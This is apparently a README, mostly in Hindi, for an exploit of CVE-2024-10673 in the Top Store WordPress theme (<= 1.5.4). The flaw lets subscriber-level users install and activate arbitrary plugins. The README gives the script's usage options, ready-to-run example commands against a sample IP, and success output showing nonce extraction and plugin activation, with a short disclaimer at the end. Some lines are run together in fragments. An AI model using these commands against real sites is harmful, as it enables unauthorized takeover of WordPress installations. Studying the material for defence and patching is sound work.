
टॉप स्टोर <= 1.5.4 - प्रमाणित (सब्सक्राइबर+) मनमाना प्लगइन इंस्टॉलेशन/एक्टिवेशन
यह स्क्रिप्ट CVE-2024-10673 का शोषण करती है, जो Top Store WordPress थीम (<= 1.5.4) में पाई गई एक गंभीर कमजोरी है। यह दोष प्रमाणित उपयोगकर्ताओं को, जिनके पास सब्सक्राइबर-स्तर या उच्च पहुंच है, असुरक्षित AJAX अनुरोधों के माध्यम से मनमाने प्लगइन इंस्टॉल और सक्रिय करने की अनुमति देता है।
nonce को गतिशील रूप से निकालता है।themes.php?page=thunk_started से।hunk-companion या उपयोगकर्ता-परिभाषित प्लगइन)।usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to install and activate (default: hunk-companion)
hunk-companion) इंस्टॉल और सक्रिय करें:
python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
woocommerce) इंस्टॉल और सक्रिय करें:
python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}
अपनी वर्डप्रेस साइट को सुरक्षित करने के लिए:
यह स्क्रिप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है! जिम्मेदारी से उपयोग करें!
द्वारा: खालिद अल-एनाज़ी (Nxploit)